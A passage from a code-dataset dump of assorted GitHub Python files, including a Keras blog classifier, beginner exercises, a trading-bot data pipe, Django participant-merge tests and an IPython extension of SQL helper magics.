packet.seek(0)\n\n with open('output.pdf', 'wb') as f:\n f.write(packet.getvalue())\n\n print(\"New PDF saved as output.pdf\")\n\n\ndef replace_ligatures(text):\n ligature_map = {\n 'ff': 'ff',\n 'fi': 'fi',\n 'fl': 'fl',\n 'ffi': 'ffi',\n 'ffl': 'ffl',\n 'œ': 'oe',\n 'æ': 'ae'\n }\n\n for ligature, replacement in ligature_map.items():\n text = text.replace(ligature, replacement)\n\n return text\n","repo_name":"emreoztas64/pdfToBionic","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20956308589","text":"import sys\nimport argparse\nimport pickle\nimport numpy as np\nimport random as rd\nfrom hanziconv import HanziConv\nfrom keras.datasets import imdb\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Reshape, LSTM\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D \nfrom keras.layers.pooling import GlobalMaxPooling1D\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nfrom keras.optimizers import Adam\nfrom sklearn.preprocessing import Normalizer\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-b', '--batch_size')\n parser.add_argument('-l', '--learning_rate')\n parser.add_argument('-e', '--epochs')\n parser.add_argument('-fn', '--filter_num')\n parser.add_argument('-fs', '--filter_size')\n parser.add_argument('-cn', '--conv_layer_num')\n parser.add_argument('-d1', '--dropout_prob1')\n parser.add_argument('-d2', '--dropout_prob2')\n parser.add_argument('-op', '--op')\n parser.add_argument('-sh', '--shuffle')\n parser.add_argument('-ad', '--addOneMoreDense')\n parser.add_argument('-dd', '--one_more_dense_dim')\n parser.add_argument('-gl', '--max_over_time_pooling')\n parser.add_argument('-ty', '--model_type')\n return parser.parse_args()\n\ndef terms2Vec(terms, word2id):\n vec = np.zeros(len(embeddings[0]))\n for term in terms:\n ID = word2id.get(HanziConv.toSimplified(term)) #Problem: Some terms are not pretrained, like '食记','咖哩','捷运'\n if ID == None:\n vec += embeddings[0]\n else:\n vec += embeddings[ID]\n vec /= len(terms)\n return vec\ndef balanceData(X, y):\n isS_num, notS_num = 0, 0\n total_num = len(y)\n isS_index = []\n notS_index = []\n for i,y_prob in enumerate(y):\n if y_prob[0] == 1:\n isS_num += 1\n isS_index.append(i)\n elif y_prob[1] == 1:\n notS_num += 1\n notS_index.append(i)\n\n print('isS_num:', isS_num)\n print('notS_num', notS_num)\n print('isSponsered_ratio:', isS_num/total_num*100, '%')\n sample_num = isS_num\n X_sample = np.zeros((sample_num+isS_num, X.shape[1], X.shape[2]))\n y_sample = np.zeros((sample_num+isS_num, y.shape[1]))\n i = 0\n for sample_i in rd.sample(notS_index, sample_num):\n X_sample[i] = X[sample_i]\n y_sample[i] = y[sample_i]\n i+=1\n for index in isS_index:\n X_sample[i] = X[index]\n y_sample[i] = y[index]\n i+=1\n\n print('X:', X.shape, X_sample.shape)\n print('y:', y.shape, y_sample.shape)\n return X_sample, y_sample\n\ndef getTestingData(blogs, word2id):\n X = np.zeros((len(blogs), 1000, len(embeddings[0])))\n y = []\n y_p = []\n for i in range(len(blogs)):\n for j,terms in enumerate(blogs[i]['content']):\n X[i][j] = embeddings[word2id['<S>']]+terms2Vec(terms, word2id)+embeddings[word2id['</S>']]\n\n y_p.append([blogs[i]['label']/5,1-blogs[i]['label']/5])\n if blogs[i]['label'] > 3:\n y.append([0,1])\n else:\n y.append([1,0])\n y = np.asarray(y)\n y_p = np.asarray(y)\n return X, y, y_p\n\ndef trimBlog(labelledBlogs):\n for i,blog in enumerate(labelledBlogs):\n if len(blog['content']) > 1000:\n labelledBlogs[i]['content'] = blog['content'][:1000]\n return labelledBlogs\n\nif __name__ == '__main__':\n maxL = 4776\n if len(sys.argv) != 29:\n raise ValueError('Incorrect number of arguments')\n args = parse_args()\n\n batch_size = int(args.batch_size)#128\n learning_rate = float(args.learning_rate)#0.001\n epochs =int(args.epochs)#50\n\n filter_num = int(args.filter_num)#32\n filter_size = int(args.filter_size) #3\n #filter_size = list(map(int, args.filter_size.split(','))) #3,4,5\n conv_layer_num =int(args.conv_layer_num)#2\n dropout_prob1 = float(args.dropout_prob1)#0.25\n dropout_prob2 = float(args.dropout_prob2)#0.5\n op=args.op\n if args.shuffle == 'T':\n shuffle = True\n elif args.shuffle == 'F':\n shuffle = False\n else:\n raise ValueError('Wrong arg: shuffle')\n\n if args.addOneMoreDense== 'T':\n addOneMoreDense = True\n elif args.addOneMoreDense == 'F':\n addOneMoreDense = False\n else:\n raise ValueError('Wrong arg: addOneMoreDense')\n one_more_dense_dim = int(args.one_more_dense_dim)#16\n if args.max_over_time_pooling == 'T':\n max_over_time_pooling = True\n elif args.max_over_time_pooling =='F':\n max_over_time_pooling = False\n else:\n raise ValueError('Wrong arg: max_over_time_pooling')\n\n np.random.seed(7)\n rd.seed(0)\n\n [blogs, ptts, X_train, y_train, X_valid, y_valid, embeddings] = pickle.load(open(\"../afterProcessing/small/blogs_ptts_sen.p\", \"rb\" ))\n\n # Testing data\n newblogs = pickle.load(open( \"../blogs.pickle\", \"rb\" ))\n labelledBlogs = [newblogs[i] for i in range(len(newblogs)) if newblogs[i]['label'] != None and newblogs[i]['label'] != 0]\n labelledBlogs = trimBlog(labelledBlogs)\n words, embeddings = pickle.load(open('../polyglot-zh.pkl', 'rb'), encoding='latin1')\n word2id = { w:i for (i,w) in enumerate(words) }\n X_test, y_test, y_test_p = getTestingData(labelledBlogs, word2id)\n\n print('train:')#data, sentenceN, embedding size\n X_train_sample, y_train_sample = balanceData(X_train, y_train)\n\n\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(len(y_train_sample)))\n X_train_sample = X_train_sample[shuffle_indices]\n y_train_sample = y_train_sample[shuffle_indices]\n\n model_type = args.model_type\n model = Sequential()\n if model_type == 'cnn':\n model.add(Conv1D(filters=filter_num, kernel_size=filter_size, padding='same', activation='relu', input_shape=(X_train.shape[1], X_train.shape[2])))\n\n for i in range(conv_layer_num-1):\n model.add(Conv1D(filters=filter_num, kernel_size=filter_size, padding='same', activation='relu'))\n \n if max_over_time_pooling:\n model.add(GlobalMaxPooling1D())\n else:\n model.add(MaxPooling1D(pool_size=2))\n model.add(Dropout(dropout_prob1))\n model.add(Flatten())\n\n if addOneMoreDense:\n model.add(Dense(one_more_dense_dim, activation='relu'))\n elif model_type == 'lstm':\n model.add(LSTM(32, input_shape=(X_train.shape[1], X_train.shape[2])))\n else:\n raise ValueError('model_type')\n\n model.add(Dropout(dropout_prob2))\n model.add(Dense(2, activation='softmax'))\n adam = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n\n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n print(model.summary())\n print(X_train_sample.shape, y_train_sample.shape)\n model.fit(X_train_sample, y_train_sample, epochs=epochs, batch_size=batch_size)\n\n scores = model.evaluate(X_valid, y_valid, verbose=0)\n print(\"Loss:\", scores[0])\n print(\"Accuracy:\", scores[1])\n print(\"Test:\")\n scores = model.evaluate(X_test, y_test, verbose=0)\n print(\"Loss:\", scores[0])\n print(\"Accuracy:\", scores[1])\n pred = model.predict(X_test, verbose=0)\n","repo_name":"chipyaya/Projects_Experience","sub_path":"2017IR_FPJ/models/cnn_pretrain_sen_avg_old.py","file_name":"cnn_pretrain_sen_avg_old.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32813874313","text":"\"\"\"Write a recursive function that takes an integer and returns that integer’s factorial. Remember that\n\nfactorial(4) is 4 * 3 * 2 * 1. Another way to think of that is factorial (4) = 4 * factorial(3)\"\"\"\n\n\n\ndef factorial(num):\n\t'''Takes in integer input from user and returns interger's factorial.'''\n\tif num == 0: # terminating case\n\t\treturn 1\n\t\t\n\telse:\n\t\treturn num * factorial(num - 1)\n\n# ––––––––––––––––––––––Main Program–––––––––––––––––––––––––\nprint(\"The factorial of 14 is : {}\".format(factorial(14)))\nprint(\"The factorial of 8 is : {}\".format(factorial(8)))","repo_name":"nb15/Practice-Problems-Unit-7","sub_path":"practiceProb1.py","file_name":"practiceProb1.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73663488091","text":"#Este programa retorna uma lista de números primos,\r\n#com a quantidade de números estipulada pelo usuário.\r\n\r\ndef list_primo(qtd):\r\n lista = []\r\n i = 0\r\n while len(lista) < qtd:\r\n i += 1\r\n if is_primo(i) == True:\r\n lista.append(i)\r\n return lista\r\n\r\ndef is_primo(num):\r\n primo = True\r\n while primo == True:\r\n if num == 1 or num == 2: break\r\n for i in range(2,num): \r\n if num % i == 0:\r\n primo = False\r\n break\r\n if not primo:\r\n return False\r\n else:\r\n return True\r\n\r\nprint (\"---------------------------------------\")\r\nprint (\"Bem vindo ao programa de números primos\")\r\nprint (\"---------------------------------------\")\r\n\r\n\r\n\r\n\r\nsel = 3\r\nloop = True\r\n\r\nwhile loop:\r\n\r\n print (\"\\nGerar sequência de primos - Digite 1\")\r\n print (\"Verificar se é primo - Digite 2\")\r\n print (\"Para sair - Digite 0\")\r\n \r\n while sel > 2:\r\n sel = int(input())\r\n\r\n if sel == 1:\r\n sel = 3\r\n qtd = int(input(\"Digite a quantidade de números primos desejada: \"))\r\n\r\n lista = list_primo(qtd)\r\n\r\n print(lista)\r\n\r\n elif sel == 2:\r\n sel = 3\r\n cont = 1\r\n while cont == 1:\r\n num = int(input('\\nDigite o número a ser verificado: '))\r\n if is_primo(num) == True:\r\n print(\"O número \", num, \" é primo.\")\r\n else:\r\n print(\"O número \", num, \" não é primo.\")\r\n cont = int(input(\"\\nPara verificar outro número digite 1, para sair digite 0.\"))\r\n\r\n elif sel == 0:\r\n loop = False\r\n\r\n\r\n\r\n","repo_name":"GabrielVZanata/AnalisedeDados-Python","sub_path":"Lista_Num_Primos/Lista_N_Primos.py","file_name":"Lista_N_Primos.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70888153050","text":"import time, queue\nimport pandas as pd\nfrom pathlib import Path\ntry:\n from element_types import Record, Function, ProcCMD, GuiCMD\nexcept ImportError: \n from Pythonic.element_types import Record, Function, ProcCMD, GuiCMD\n \nclass Element(Function):\n\n def __init__(self, id, config, inputData, return_queue, cmd_queue):\n super().__init__(id, config, inputData, return_queue, cmd_queue)\n\n\n def execute(self):\n df_in = pd.DataFrame(self.inputData, columns=['close_time', 'open', 'high', 'low', 'close', 'volume'])\n df_in['close_time'] = df_in['close_time'].floordiv(1000) # remove milliseconds from timestamp\n\n file_path = Path.home() / 'Pythonic' / 'executables' / 'ADAUSD_5m.df'\n\n try:\n # load existing dataframe\n df = pd.read_pickle(file_path)\n # count existing rows\n n_row_cnt = df.shape[0]\n # concat latest OHLCV data\n df = pd.concat([df,df_in], ignore_index=True).drop_duplicates(['close_time'])\n df.reset_index(drop=True, inplace=True)\n # calculate number of new rows\n n_new_rows = df.shape[0] - n_row_cnt\n log_txt = '{}: {} new rows written'.format(file_path, n_new_rows)\n\n except Exception as e:\n log_txt = 'File error - writing new one'\n df = df_in \n\n df.to_pickle(file_path)\n\n logInfo = Record(None, log_txt)\n self.return_queue.put(logInfo)","repo_name":"hANSIc99/Pythonic","sub_path":"examples/trading_bot_crossing_ema/generic_pipe_3e059017.py","file_name":"generic_pipe_3e059017.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":382,"dataset":"github-code","pt":"32"} +{"seq_id":"20952932547","text":"''' 1. Faça um programa, com uma função que necessite de três\nargumentos, e que forneça a soma desses três argumentos. \n\ndef soma_tres_numeros(a, b, c):\n soma = a + b + c\n return soma\n\nnum1 = float(input(\"Digite o primeiro número: \"))\nnum2 = float(input(\"Digite o segundo número: \"))\nnum3 = float(input(\"Digite o terceiro número: \"))\n\nresultado = soma_tres_numeros(num1, num2, num3)\nprint(\"A soma dos três números é:\", resultado) \n\n2. \"Reverso do número. Faça uma função que retorne o reverso de\num número inteiro informado. Por exemplo: 127 -> 721.\n\ndef reverso_numero(numero):\n numero_str = str(numero)\n reverso_str = numero_str[::-1]\n reverso = int(reverso_str)\n return reverso\n\nnumero = int(input(\"Digite um número inteiro: \"))\nreverso = reverso_numero(numero)\nprint(\"O reverso do número é:\", reverso)\n\n\n\n3. Escreva um script que pergunta ao usuário se ele deseja\nconverter uma temperatura de grau Celsius para Fahrenheit ou\nvice-versa. Para cada opção, crie uma função. Crie uma terceira,\nque é um menu para o usuário escolher a opção desejada, onde\nesse menu chama a função de conversão correta. '''\n\ndef celsius_para_fahrenheit(celsius):\n fahrenheit = (celsius * 9/5) + 32\n return fahrenheit\n\ndef fahrenheit_para_celsius(fahrenheit):\n celsius = (fahrenheit - 32) * 5/9\n return celsius\n\ndef menu():\n print(\"Escolha a o tipo de temperatura:\")\n print(\"1. Celsius para Fahrenheit\")\n print(\"2. Fahrenheit para Celsius\")\n escolha = int(input(\"Digite o número da opção desejada: \"))\n\n if escolha == 1:\n celsius = float(input(\"Digite a temperatura em Celsius: \"))\n resultado = celsius_para_fahrenheit(celsius)\n print(f\"{celsius}°C é igual a {resultado:.2f}°F\")\n elif escolha == 2:\n fahrenheit = float(input(\"Digite a temperatura em Fahrenheit: \"))\n resultado = fahrenheit_para_celsius(fahrenheit)\n print(f\"{fahrenheit}°F é igual a {resultado:.2f}°C\")\n else:\n print(\"Opção inválida\")\n\nmenu()\n","repo_name":"chandrasantos/bootcamp_python_django_womakerscode","sub_path":"4_exercicios_funcoes.py","file_name":"4_exercicios_funcoes.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12027517842","text":"import csv\n\ndef cleanContests(file):\n\n #Converts csv file to list of Python dictionaries\n with open(file, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n lst_dict = list(csv_reader)\n\n \n #Identifies duplicated record\n stack = []\n dup = []\n for contest in lst_dict:\n for c_name in lst_dict:\n if contest['ContestName'] == c_name['ContestName']:\n if contest['ContestName'] not in stack:\n stack.append(contest['ContestName'])\n else:\n dup.append(contest['ContestName'])\n dup = set(dup)\n non_dup = ''.join(dup)\n \n #Removes second copy of duplicated record\n count = 1\n for i in range(len(lst_dict)):\n if lst_dict[i]['ContestName']==non_dup:\n if count <= 1:\n count += 1\n else:\n il_id = lst_dict[i]['ContestID']\n del lst_dict[i]\n else:\n continue\n\n #Writes Python dictionary to new csv file\n\n #commented out for testing related to bird on the brain\n # csv_columns = ['ContestID','ContestName', 'ContestShortName', 'ContestFullName','VoteRule', 'ContestType']\n\n # csv_file = \"Contests_Output.csv\"\n # try:\n # with open(csv_file, 'w', newline='') as csvfile:\n # writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n # writer.writeheader()\n # for data in lst_dict:\n # writer.writerow(data)\n # except IOError:\n # print(\"I/O error\")\n # return il_id\n\ncleanContests('contests.csv')\n\n\n","repo_name":"JACedwards/Clear-Ballot-Group","sub_path":"Contests_Cleaner.py","file_name":"Contests_Cleaner.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73661269851","text":"import combos.common as combo\n\nLEFT_PLAYER_X = 0\nLEFT_PLAYER_Y = 0\nRIGHT_PLAYER_X = 0\nRIGHT_PLAYER_Y = 0\nCURRENT_FACING_SIDE = combo.MOVE_RIGHT\nENEMY_SPEAR = None\nENEMY_SUBZERO_STUN = None\nENEMY_TELEPORTING = None\nLAST_FRAME = None\nNUMBER_OF_FRAMES_SINCE_LAST_FACING_SIDE_CHECK = 60\nOPPONENT = None\n","repo_name":"gabrielxzc/EESTEC9","sub_path":"globals_vars.py","file_name":"globals_vars.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24873548374","text":"import unittest\nfrom datetime import datetime\nfrom zoneinfo import ZoneInfo\n\nfrom django.contrib.auth.models import Permission, User\nfrom django.db import connections\nfrom django.db.utils import IntegrityError\nfrom django.test import TestCase\nfrom mitoc_const import affiliations\n\nfrom ws import merge, models\nfrom ws.tests import factories\n\n\n# TODO (mypy): If/when using type checking, just get rid of this\nclass ExpectationsTypeTest(unittest.TestCase):\n def _assert_table_to_col_tuple(self, expectations):\n self.assertTrue(isinstance(expectations, dict))\n self.assertTrue(all(isinstance(cols, tuple) for cols in expectations.values()))\n\n def test_expectations(self):\n \"\"\"Basic type checking to guard against silly typos.\"\"\"\n self._assert_table_to_col_tuple(merge.EXPECTED_USER_TABLES)\n self._assert_table_to_col_tuple(merge.EXPECTED_PARTICIPANT_TABLES)\n\n\nclass MergeUtilTest(TestCase):\n def test_check_fk_tables_missing_fk(self):\n cursor = connections['default'].cursor()\n expected = {\n 'auth_user_user_permissions': 'user_id',\n 'auth_user_groups': 'user_id',\n 'account_emailaddress': 'user_id',\n # 'django_admin_log': 'user_id',\n 'socialaccount_socialaccount': ('user_id',),\n 'ws_participant': 'user_id',\n }\n with self.assertRaises(ValueError) as err:\n merge.check_fk_tables(\n cursor, src_table='auth_user', column='id', expected=expected\n )\n\n self.assertEqual(\n str(err.exception),\n 'Database has more FKs. Not handled: django_admin_log.user_id',\n )\n\n def test_simple_fk_update(self):\n \"\"\"We can directly modify any rows that have FK constraints (without unique constraints)\"\"\"\n cursor = connections['default'].cursor()\n\n # Make Two users - we'll transfer the email address from one to the other\n user = factories.UserFactory.create(email='primary@example.com')\n other = factories.UserFactory.create(email='other@example.com')\n other.emailaddress_set.update(primary=False) # (allows the move)\n\n # Move the secondary email address for the other user to our user\n merge.simple_fk_update(\n cursor, 'account_emailaddress', 'user_id', other.pk, user.pk\n )\n self.assertCountEqual(\n [email_addr.email for email_addr in user.emailaddress_set.all()],\n ['primary@example.com', 'other@example.com'],\n )\n\n\nclass MergeTest(TestCase):\n def setUp(self):\n super().setUp()\n self.old = factories.ParticipantFactory.create(\n email='tim@mit.edu', affiliation=affiliations.MIT_UNDERGRAD.CODE\n )\n self.tim = factories.ParticipantFactory.create(\n email='tim@alum.mit.edu', affiliation=affiliations.MIT_ALUM.CODE\n )\n\n def _migrate(self):\n merge.merge_participants(self.old, self.tim)\n self.tim.refresh_from_db()\n\n def _assert_email_handling(self):\n \"\"\"Tim retains his primary email address, but also gains his old MIT address!\"\"\"\n self.assertEqual(self.tim.email, 'tim@alum.mit.edu')\n emails = {addr.email: addr for addr in self.tim.user.emailaddress_set.all()}\n self.assertCountEqual(emails, {'tim@mit.edu', 'tim@alum.mit.edu'})\n self.assertFalse(emails['tim@mit.edu'].primary)\n self.assertTrue(emails['tim@alum.mit.edu'].primary)\n self.assertEqual(emails['tim@mit.edu'].user_id, self.tim.user_id)\n self.assertEqual(emails['tim@alum.mit.edu'].user_id, self.tim.user_id)\n\n def _assert_user_handling(self):\n \"\"\"Tim's old user is removed, but his groups & emails are preserved.\"\"\"\n self.assertFalse(User.objects.filter(pk=self.old.user_id))\n\n def test_migrate_participant(self):\n \"\"\"Test the usual case of migrating a normal participant.\"\"\"\n self._migrate()\n\n self._assert_email_handling()\n self._assert_user_handling()\n\n def test_old_lotteryinfo_removed(self):\n \"\"\"When the new participant has an up-to-date lottery info, we use that.\"\"\"\n old_info = factories.LotteryInfoFactory.create(participant=self.old)\n new_info = factories.LotteryInfoFactory.create(participant=self.tim)\n self._migrate()\n\n new_info.refresh_from_db() # Still exists! We did not alter.\n with self.assertRaises(models.LotteryInfo.DoesNotExist):\n old_info.refresh_from_db()\n\n def test_old_lotteryinfo_migrated(self):\n \"\"\"When only the old participant had lottery info, we migrate that.\"\"\"\n old_info = factories.LotteryInfoFactory.create(participant=self.old)\n self._migrate()\n\n old_info.refresh_from_db()\n self.assertEqual(old_info.participant, self.tim)\n\n def test_permissions_not_handled(self):\n \"\"\"We don't make use of permissions, so we don't attempt to migrate.\"\"\"\n permission = Permission.objects.first() # Doesn't matter what for.\n self.assertIsNotNone(permission)\n self.old.user.user_permissions.add(permission)\n with self.assertRaises(ValueError):\n self._migrate()\n\n self.old.refresh_from_db() # Still exists! We rolled back.\n\n def test_feedback_migrated(self):\n \"\"\"This is an example of a model with two separate FK's to the participant table.\"\"\"\n feedback_as_participant = factories.FeedbackFactory.create(participant=self.old)\n feedback_as_leader = factories.FeedbackFactory.create(leader=self.old)\n\n self._migrate()\n feedback_as_participant.refresh_from_db()\n feedback_as_leader.refresh_from_db()\n self.assertEqual(feedback_as_participant.participant.pk, self.tim.pk)\n self.assertEqual(feedback_as_leader.leader, self.tim)\n\n def test_password_quality(self):\n \"\"\"Only password quality from the newer participant is kept.\"\"\"\n factories.PasswordQualityFactory.create(participant=self.old, is_insecure=True)\n factories.PasswordQualityFactory.create(participant=self.tim, is_insecure=False)\n self._migrate()\n self.assertFalse(self.tim.passwordquality.is_insecure)\n\n def test_membership_reminders(self):\n \"\"\"The newest reminder is honored, even if delivered to the older participant.\"\"\"\n newer_reminder_sent_at = datetime(2020, 12, 25, tzinfo=ZoneInfo(\"UTC\"))\n factories.MembershipReminderFactory.create(\n participant=self.tim,\n reminder_sent_at=datetime(2020, 10, 1, tzinfo=ZoneInfo(\"UTC\")),\n )\n factories.MembershipReminderFactory.create(\n participant=self.old,\n reminder_sent_at=newer_reminder_sent_at,\n )\n\n self._migrate()\n reminder = models.MembershipReminder.objects.get(participant=self.tim)\n self.assertEqual(reminder.reminder_sent_at, newer_reminder_sent_at)\n\n def test_conflicts(self):\n \"\"\"We cannot merge participants who are clearly different people.\"\"\"\n trip = factories.TripFactory.create()\n\n # Each participant can have at most one signup per trip!\n factories.SignUpFactory.create(participant=self.old, trip=trip)\n factories.SignUpFactory.create(participant=self.tim, trip=trip)\n with self.assertRaises(IntegrityError):\n self._migrate()\n\n self.old.refresh_from_db() # Still exists! We rolled back.\n","repo_name":"DavidCain/mitoc-trips","sub_path":"ws/tests/test_merge.py","file_name":"test_merge.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"32"} +{"seq_id":"72027458970","text":"\"\"\"\nAuthor: mhristov\nSource: readSqlExt.py\nDate: 02/11/17 15:20\n\nPurpose: IPython extension for working with databases.\n\nProvides magic functions for various db related tasks like:\n 1. Running and explaining sqls.\n 2. Finding and getting info about tables, columns, indexes.\n 3. Finding and getting info about plsql packages, functions and procedures.\n 4. Table statistics.\n 5. Getting plsql packages/views source.\n\nDoc: %helpsql\n\"\"\"\n\nimport os\nimport sys\nfrom cx_Oracle import DatabaseError\nfrom sqlalchemy import exc\nimport pydoc\n\nsys.path.append(os.path.join(os.environ['HOME'], 'python_lib'))\nimport db_utilities as dbu\n\ndefault_db_alias = 'oradb'\nmysql_schema = None\nengine = dbu.getDbConnection(default_db_alias, schema=mysql_schema, asEngine=True)\n\n\ndef parse_line(line, usage_fn):\n \"\"\"\n Function for parsing the line parameter of a magic function\n :param line:\n :param usage_fn:\n :return:\n \"\"\"\n line = line.strip()\n args = [a for a in line.split(' ') if a != '']\n status = True\n table_name = None\n alias = None\n # print(args)\n if len(line) == 0:\n usage_fn()\n status = False\n elif len(args) == 1:\n table_name = line\n alias = default_db_alias\n elif len(args) == 2:\n table_name = args[0]\n alias = args[1]\n else:\n usage_fn()\n status = False\n\n return status, table_name, alias\n\n\ndef setDefaultDbAlias(line):\n \"\"\"\n Extension function to set a default db alias\n :param db_alias:\n :param mysql_schema:\n :return:\n \"\"\"\n global default_db_alias\n global mysql_schema\n global engine\n\n line = line.strip()\n args = [a for a in line.split(' ') if a != '']\n if len(line) == 0:\n print('Default DB Alias: {}'.format(default_db_alias))\n if mysql_schema is not None:\n print('Mysql Schema: {}'.format(mysql_schema))\n return\n elif len(args) == 1:\n default_db_alias = str(args[0]).upper()\n elif len(args) == 2:\n default_db_alias = str(args[0]).upper()\n mysql_schema = str(args[1])\n\n # if default_db_alias.startswith('MYSQL') and mysql_schema is None:\n # default_db_alias = 'oradb'\n # print('MYSQL alias requires setting db schema.\\nPlease set db schema ex: %setDefaultDbAlias MYSQLDEV clams')\n # return\n\n aliases = dbu.getDbAliases(asDataFrame=True)\n\n if default_db_alias not in aliases[0].tolist():\n print('DB Alias {} not in config.'.format(default_db_alias))\n default_db_alias = 'oradb'\n return\n\n print('Default DB Alias set to {}'.format(default_db_alias))\n if default_db_alias is not None:\n print('Mysql Schema: {}'.format(mysql_schema))\n\n engine = dbu.getDbConnection(default_db_alias, schema=mysql_schema, asEngine=True)\n\n\ndef helpsql(line):\n \"\"\"\n IPython extension function for getting documentaion on sql related functions in readSqlExt extension.\n :return: None\n \"\"\"\n module_ = pydoc.importfile(__file__)\n pydoc.doc(module_)\n\n\ndef getDbObjectSource(line):\n \"\"\"\n Ipython extension function to get the source of an oracle db object\n Usage: %getDbObjectSource object_name [object_type (default: TABLE)] [db_alias (default: oradb)]\n :param object_name: Name of the package\n :param db_alias: db alias\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getDbObjectSource object_name [object_type (default: TABLE)] [db_alias (default: {})]'.format(default_db_alias))\n\n line = line.strip()\n\n if len(line) == 0:\n usage()\n return\n elif len(line.split(' ')) == 1:\n object_name = line\n object_type = 'TABLE'\n alias = default_db_alias\n elif len(line.split(' ')) == 2:\n args = line.split(' ')\n object_name = args[0]\n object_type = args[1]\n alias = default_db_alias\n elif len(line.split(' ')) == 3:\n args = line.split(' ')\n object_name = args[0]\n object_type = args[1]\n alias = args[2]\n else:\n usage()\n return\n\n try:\n source = dbu.getDbObjectSource(object_name, object_type, alias)\n return source\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef findFunction(line):\n \"\"\"\n IPython extension function to find a plsql function within a package for a given schema\n Note: Standalone functions are not included\n Usage: %findFunction function_name [db_alias (default: oradb)]\n :param function_name:\n :param alias:\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %findFunction function_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, function_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.findFunction(function_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getPackageFunctions(line):\n \"\"\"\n Ipython extension function to get all functions for a package\n Usage: %getPackageFunctions package_name [db_alias (default: oradb)]\n :param package_name: Name of the package\n :param db_alias: db alias\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getPackageFunctions package_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, package_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getPackageFunctions(package_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getPackages(line):\n \"\"\"\n Ipython extension function for getting db packages\n Usage: %getPackage package_name [db_alias (default: oradb)]\n :param package_name: Name of the package\n :param db_alias: db alias\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getPackage package_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, package_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getPackages(package_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef gatherTableStats(line):\n \"\"\"\n Ipython extension function for gathering table statistics\n Usage: %gatherTableStats table_name [owner (default: USER)] [db_alias (default: oradb)]\n :param table_name:\n :param owner:\n :param db_alias:\n :return:\n \"\"\"\n\n def usage():\n print('Usage: %gatherTableStats table_name [owner (default: USER)] [db_alias (default: oradb)]')\n\n line = line.strip()\n\n if len(line) == 0:\n usage()\n return\n elif len(line.split(' ')) == 1:\n table_name = line\n owner = 'USER'\n alias = default_db_alias\n elif len(line.split(' ')) == 2:\n args = line.split(' ')\n table_name = args[0]\n owner = args[1]\n alias = default_db_alias\n elif len(line.split(' ')) == 3:\n args = line.split(' ')\n table_name = args[0]\n owner = args[1]\n alias = args[2]\n else:\n usage()\n return\n\n try:\n dbu.gatherTableStats(table_name, owner, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getTableStats(line):\n \"\"\"\n Ipython extenstion function for getting table statistics\n Usage: %getTableStats table_name [db_alias (default: oradb)]\n :param table_name:\n :param db_alias:\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getTableStats table_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, table_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getTableStats(table_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getTables(line):\n \"\"\"\n Ipython extenstion function for finding tables\n Usage: %getTables table_name [db_alias (default: oradb)]\n :param table_name:\n :param db_alias:\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getTables table_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, table_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getTables(table_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getTabColumns(line):\n \"\"\"\n Ipython extenstion function for getting table columns\n Usage: %getTabColumns table_name [db_alias (default: oradb)]\n :param table_name: Name of table\n :param db_alias:\n :return:\n \"\"\"\n\n def usage():\n print('Usage: %getTabColumns table_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, table_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getTableColumns(table_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef findColumn(line):\n \"\"\"\n Ipython 